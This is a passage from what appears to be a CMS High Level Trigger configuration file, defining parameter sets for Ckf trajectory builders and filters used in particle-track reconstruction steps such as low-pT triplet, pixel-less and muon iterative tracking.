ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
minimumNumberOfHits = cms.int32( 3 ),
seedPairPenalty = cms.int32( 5 ),
chargeSignificance = cms.double( -1.0 ),
minPt = cms.double( 0.2 ),
nSigmaMinPt = cms.double( 5.0 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHits = cms.int32( 999 ),
maxConsecLostHits = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
maxLostHitsFraction = cms.double( 0.1 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedExtension = cms.int32( 0 ),
strictSeedExtension = cms.bool( False ),
pixelSeedExtension = cms.bool( False ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
maxCCCLostHits = cms.int32( 0 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetLowPtTripletStepTrajectoryBuilder = cms.PSet(
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
bestHitOnly = cms.bool( True ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetLowPtTripletStepTrajectoryFilter" ) ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetLowPtTripletStepTrajectoryFilter" ) ),
useSameTrajFilter = cms.bool( True ),
maxCand = cms.int32( 4 ),
intermediateCleaning = cms.bool( True ),
lostHitPenalty = cms.double( 30.0 ),
foundHitBonus = cms.double( 10.0 ),
MeasurementTrackerName = cms.string( "" ),
lockHits = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
updator = cms.string( "hltESPKFUpdator" ),
alwaysUseInvalidHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
keepOriginalIfRebuildFails = cms.bool( False ),
estimator = cms.string( "hltESPLowPtTripletStepChi2ChargeMeasurementEstimator9" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
seedAs5DHit = cms.bool( False )
)
HLTPSetLowPtTripletStepTrajectoryFilter = cms.PSet(
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
minimumNumberOfHits = cms.int32( 3 ),
seedPairPenalty = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
minPt = cms.double( 0.075 ),
nSigmaMinPt = cms.double( 5.0 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHits = cms.int32( 999 ),
maxConsecLostHits = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
maxLostHitsFraction = cms.double( 0.1 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedExtension = cms.int32( 0 ),
strictSeedExtension = cms.bool( False ),
pixelSeedExtension = cms.bool( False ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
maxCCCLostHits = cms.int32( 0 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetDetachedQuadStepTrajectoryBuilder = cms.PSet(
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
bestHitOnly = cms.bool( True ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedQuadStepTrajectoryFilter" ) ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedQuadStepTrajectoryFilter" ) ),
useSameTrajFilter = cms.bool( True ),
maxCand = cms.int32( 3 ),
intermediateCleaning = cms.bool( True ),
lostHitPenalty = cms.double( 30.0 ),
foundHitBonus = cms.double( 10.0 ),
MeasurementTrackerName = cms.string( "" ),
lockHits = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
updator = cms.string( "hltESPKFUpdator" ),
alwaysUseInvalidHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
keepOriginalIfRebuildFails = cms.bool( False ),
estimator = cms.string( "hltESPDetachedQuadStepChi2ChargeMeasurementEstimator9" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
seedAs5DHit = cms.bool( False )
)
HLTPSetDetachedQuadStepTrajectoryFilter = cms.PSet(
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
minimumNumberOfHits = cms.int32( 3 ),
seedPairPenalty = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
minPt = cms.double( 0.075 ),
nSigmaMinPt = cms.double( 5.0 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHits = cms.int32( 999 ),
maxConsecLostHits = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
maxLostHitsFraction = cms.double( 0.1 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedExtension = cms.int32( 0 ),
strictSeedExtension = cms.bool( False ),
pixelSeedExtension = cms.bool( False ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
maxCCCLostHits = cms.int32( 0 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetDetachedTripletStepTrajectoryBuilder = cms.PSet(
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
bestHitOnly = cms.bool( True ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedTripletStepTrajectoryFilter" ) ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetDetachedTripletStepTrajectoryFilter" ) ),
useSameTrajFilter = cms.bool( True ),
maxCand = cms.int32( 3 ),
intermediateCleaning = cms.bool( True ),
lostHitPenalty = cms.double( 30.0 ),
foundHitBonus = cms.double( 10.0 ),
MeasurementTrackerName = cms.string( "" ),
lockHits = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
updator = cms.string( "hltESPKFUpdator" ),
alwaysUseInvalidHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
keepOriginalIfRebuildFails = cms.bool( False ),
estimator = cms.string( "hltESPDetachedTripletStepChi2ChargeMeasurementEstimator9" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
seedAs5DHit = cms.bool( False )
)
HLTPSetDetachedTripletStepTrajectoryFilter = cms.PSet(
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
minimumNumberOfHits = cms.int32( 3 ),
seedPairPenalty = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
minPt = cms.double( 0.075 ),
nSigmaMinPt = cms.double( 5.0 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHits = cms.int32( 999 ),
maxConsecLostHits = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
maxLostHitsFraction = cms.double( 0.1 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedExtension = cms.int32( 0 ),
strictSeedExtension = cms.bool( False ),
pixelSeedExtension = cms.bool( False ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
maxCCCLostHits = cms.int32( 0 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetMixedTripletStepTrajectoryBuilder = cms.PSet(
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
bestHitOnly = cms.bool( True ),
propagatorAlong = cms.string( "PropagatorWithMaterialForMixedStep" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetMixedTripletStepTrajectoryFilter" ) ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetMixedTripletStepTrajectoryFilter" ) ),
useSameTrajFilter = cms.bool( True ),
maxCand = cms.int32( 2 ),
intermediateCleaning = cms.bool( True ),
lostHitPenalty = cms.double( 30.0 ),
foundHitBonus = cms.double( 10.0 ),
MeasurementTrackerName = cms.string( "" ),
lockHits = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
updator = cms.string( "hltESPKFUpdator" ),
alwaysUseInvalidHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
keepOriginalIfRebuildFails = cms.bool( False ),
estimator = cms.string( "hltESPMixedTripletStepChi2ChargeMeasurementEstimator16" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialForMixedStepOpposite" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
seedAs5DHit = cms.bool( False )
)
HLTPSetMixedTripletStepTrajectoryFilter = cms.PSet(
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
minimumNumberOfHits = cms.int32( 3 ),
seedPairPenalty = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
minPt = cms.double( 0.1 ),
nSigmaMinPt = cms.double( 5.0 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHits = cms.int32( 999 ),
maxConsecLostHits = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
maxLostHitsFraction = cms.double( 0.1 ),
constantValueForLostHitsFractionFilter = cms.double( 1.4 ),
seedExtension = cms.int32( 0 ),
strictSeedExtension = cms.bool( False ),
pixelSeedExtension = cms.bool( False ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
maxCCCLostHits = cms.int32( 9999 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetPixelLessStepTrajectoryBuilder = cms.PSet(
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
bestHitOnly = cms.bool( True ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelLessStepTrajectoryFilter" ) ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetPixelLessStepTrajectoryFilter" ) ),
useSameTrajFilter = cms.bool( True ),
maxCand = cms.int32( 2 ),
intermediateCleaning = cms.bool( True ),
lostHitPenalty = cms.double( 30.0 ),
foundHitBonus = cms.double( 10.0 ),
MeasurementTrackerName = cms.string( "" ),
lockHits = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
updator = cms.string( "hltESPKFUpdator" ),
alwaysUseInvalidHits = cms.bool( False ),
requireSeedHitsInRebuild = cms.bool( True ),
keepOriginalIfRebuildFails = cms.bool( False ),
estimator = cms.string( "hltESPPixelLessStepChi2ChargeMeasurementEstimator16" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
minNrOfHitsForRebuild = cms.int32( 4 ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
seedAs5DHit = cms.bool( False )
)
HLTPSetPixelLessStepTrajectoryFilter = cms.PSet(
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
minimumNumberOfHits = cms.int32( 4 ),
seedPairPenalty = cms.int32( 1 ),
chargeSignificance = cms.double( -1.0 ),
minPt = cms.double( 0.1 ),
nSigmaMinPt = cms.double( 5.0 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHits = cms.int32( 0 ),
maxConsecLostHits = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
maxLostHitsFraction = cms.double( 0.1 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedExtension = cms.int32( 0 ),
strictSeedExtension = cms.bool( False ),
pixelSeedExtension = cms.bool( False ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
maxCCCLostHits = cms.int32( 9999 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetTobTecStepTrajectoryFilter = cms.PSet(
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
minimumNumberOfHits = cms.int32( 5 ),
seedPairPenalty = cms.int32( 1 ),
chargeSignificance = cms.double( -1.0 ),
minPt = cms.double( 0.1 ),
nSigmaMinPt = cms.double( 5.0 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHits = cms.int32( 0 ),
maxConsecLostHits = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
maxLostHitsFraction = cms.double( 0.1 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedExtension = cms.int32( 0 ),
strictSeedExtension = cms.bool( False ),
pixelSeedExtension = cms.bool( False ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
maxCCCLostHits = cms.int32( 9999 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetTobTecStepInOutTrajectoryFilter = cms.PSet(
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
minimumNumberOfHits = cms.int32( 4 ),
seedPairPenalty = cms.int32( 1 ),
chargeSignificance = cms.double( -1.0 ),
minPt = cms.double( 0.1 ),
nSigmaMinPt = cms.double( 5.0 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHits = cms.int32( 0 ),
maxConsecLostHits = cms.int32( 1 ),
maxNumberOfHits = cms.int32( 100 ),
maxLostHitsFraction = cms.double( 0.1 ),
constantValueForLostHitsFractionFilter = cms.double( 2.0 ),
seedExtension = cms.int32( 0 ),
strictSeedExtension = cms.bool( False ),
pixelSeedExtension = cms.bool( False ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
maxCCCLostHits = cms.int32( 9999 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTPSetTobTecStepTrajectoryBuilder = cms.PSet(
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
bestHitOnly = cms.bool( True ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetTobTecStepTrajectoryFilter" ) ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetTobTecStepInOutTrajectoryFilter" ) ),
useSameTrajFilter = cms.bool( False ),
maxCand = cms.int32( 2 ),
intermediateCleaning = cms.bool( True ),
lostHitPenalty = cms.double( 30.0 ),
foundHitBonus = cms.double( 10.0 ),
MeasurementTrackerName = cms.string( "" ),
lockHits = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
updator = cms.string( "hltESPKFUpdator" ),
alwaysUseInvalidHits = cms.bool( False ),
requireSeedHitsInRebuild = cms.bool( True ),
keepOriginalIfRebuildFails = cms.bool( False ),
estimator = cms.string( "hltESPTobTecStepChi2ChargeMeasurementEstimator16" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
minNrOfHitsForRebuild = cms.int32( 4 ),
maxDPhiForLooperReconstruction = cms.double( 2.0 ),
maxPtForLooperReconstruction = cms.double( 0.7 ),
seedAs5DHit = cms.bool( False )
)
HLTPSetGroupedCkfTrajectoryBuilderIterL3ForOI = cms.PSet(
rescaleErrorIfFail = cms.double( 1.0 ),
keepOriginalIfRebuildFails = cms.bool( False ),
lockHits = cms.bool( True ),
propagatorOpposite = cms.string( "PropagatorWithMaterialOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfTrajectoryFilterIterL3OI" ) ),
maxCand = cms.int32( 5 ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator30" ),
intermediateCleaning = cms.bool( True ),
bestHitOnly = cms.bool( True ),
deltaEta = cms.double( -1.0 ),
useSeedLayer = cms.bool( False ),
useSameTrajFilter = cms.bool( True ),
MeasurementTrackerName = cms.string( "hltSiStripClusters" ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
lostHitPenalty = cms.double( 30.0 ),
requireSeedHitsInRebuild = cms.bool( False ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorAlong = cms.string( "PropagatorWithMaterial" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
alwaysUseInvalidHits = cms.bool( True ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTPSetCkfTrajectoryFilterIterL3OI" ) ),
foundHitBonus = cms.double( 1000.0 ),
propagatorProximity = cms.string( "SteppingHelixPropagatorAny" ),
updator = cms.string( "hltESPKFUpdator" ),
deltaPhi = cms.double( -1.0 ),
seedAs5DHit = cms.bool( False )
)
HLTIter0IterL3MuonPSetGroupedCkfTrajectoryBuilderIT = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( True ),
lostHitPenalty = cms.double( 1.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter0IterL3MuonGroupedCkfTrajectoryFilterIT" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterial" ),
minNrOfHitsForRebuild = cms.int32( 2 ),
maxCand = cms.int32( 5 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator30" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter0IterL3MuonGroupedCkfTrajectoryFilterIT" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 1000.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTIter0IterL3FromL1MuonGroupedCkfTrajectoryFilterIT = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.9 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 10.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTIter0IterL3FromL1MuonPSetGroupedCkfTrajectoryBuilderIT = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "" ),
keepOriginalIfRebuildFails = cms.bool( True ),
lostHitPenalty = cms.double( 1.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( True ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter0IterL3FromL1MuonGroupedCkfTrajectoryFilterIT" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterial" ),
minNrOfHitsForRebuild = cms.int32( 2 ),
maxCand = cms.int32( 5 ),
alwaysUseInvalidHits = cms.bool( True ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator30" ),
inOutTrajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter0IterL3FromL1MuonGroupedCkfTrajectoryFilterIT" ) ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 1000.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTIter0IterL3MuonGroupedCkfTrajectoryFilterIT = cms.PSet(
minimumNumberOfHits = cms.int32( 3 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.9 ),
maxConsecLostHits = cms.int32( 1 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 10.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 0.1 ),
maxLostHits = cms.int32( 999 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTIter2HighPtTkMuPSetTrajectoryBuilderIT = cms.PSet(
ComponentType = cms.string( "CkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "hltIter2HighPtTkMuESPMeasurementTracker" ),
lostHitPenalty = cms.double( 30.0 ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter2HighPtTkMuPSetTrajectoryFilterIT" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
maxCand = cms.int32( 2 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator30" ),
intermediateCleaning = cms.bool( True ),
updator = cms.string( "hltESPKFUpdator" ),
seedAs5DHit = cms.bool( False )
)
HLTIter2IterL3FromL1MuonPSetTrajectoryFilterIT = cms.PSet(
minimumNumberOfHits = cms.int32( 5 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.3 ),
maxConsecLostHits = cms.int32( 3 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTIter2IterL3FromL1MuonPSetGroupedCkfTrajectoryBuilderIT = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "hltIter2HighPtTkMuESPMeasurementTracker" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( False ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter2IterL3FromL1MuonPSetTrajectoryFilterIT" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 2 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator30" ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 1000.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTIter2IterL3MuonPSetTrajectoryFilterIT = cms.PSet(
minimumNumberOfHits = cms.int32( 5 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 0.3 ),
maxConsecLostHits = cms.int32( 3 ),
extraNumberOfHitsBeforeTheFirstLoop = cms.int32( 4 ),
constantValueForLostHitsFractionFilter = cms.double( 1.0 ),
seedPairPenalty = cms.int32( 0 ),
maxNumberOfHits = cms.int32( 100 ),
minNumberOfHitsForLoopers = cms.int32( 13 ),
minGoodStripCharge = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
minNumberOfHitsPerLoop = cms.int32( 4 ),
minHitsMinPt = cms.int32( 3 ),
maxLostHitsFraction = cms.double( 999.0 ),
maxLostHits = cms.int32( 1 ),
highEtaSwitch = cms.double( 5.0 ),
minHitsAtHighEta = cms.int32( 5 )
)
HLTIter2IterL3MuonPSetGroupedCkfTrajectoryBuilderIT = cms.PSet(
useSameTrajFilter = cms.bool( True ),
ComponentType = cms.string( "GroupedCkfTrajectoryBuilder" ),
MeasurementTrackerName = cms.string( "hltIter2HighPtTkMuESPMeasurementTracker" ),
keepOriginalIfRebuildFails = cms.bool( False ),
lostHitPenalty = cms.double( 30.0 ),
lockHits = cms.bool( True ),
requireSeedHitsInRebuild = cms.bool( False ),
TTRHBuilder = cms.string( "hltESPTTRHBWithTrackAngle" ),
propagatorOpposite = cms.string( "PropagatorWithMaterialParabolicMfOpposite" ),
trajectoryFilter = cms.PSet( refToPSet_ = cms.string( "HLTIter2IterL3MuonPSetTrajectoryFilterIT" ) ),
propagatorAlong = cms.string( "PropagatorWithMaterialParabolicMf" ),
minNrOfHitsForRebuild = cms.int32( 5 ),
maxCand = cms.int32( 2 ),
alwaysUseInvalidHits = cms.bool( False ),
estimator = cms.string( "hltESPChi2ChargeMeasurementEstimator30" ),
intermediateCleaning = cms.bool( True ),
foundHitBonus = cms.double( 1000.0 ),
updator = cms.string( "hltESPKFUpdator" ),
bestHitOnly = cms.bool( True ),
seedAs5DHit = cms.bool( False )
)
HLTPSetCkfTrajectoryFilterIterL3OI = cms.PSet(
minimumNumberOfHits = cms.int32( 5 ),
ComponentType = cms.string( "CkfBaseTrajectoryFilter" ),
seedExtension = cms.int32( 0 ),
chargeSignificance = cms.double( -1.0 ),
pixelSeedExtension = cms.bool( False ),
strictSeedExtension = cms.bool( False ),
nSigmaMinPt = cms.double( 5.0 ),
maxCCCLostHits = cms.int32( 9999 ),
minPt = cms.double( 3.0 ),
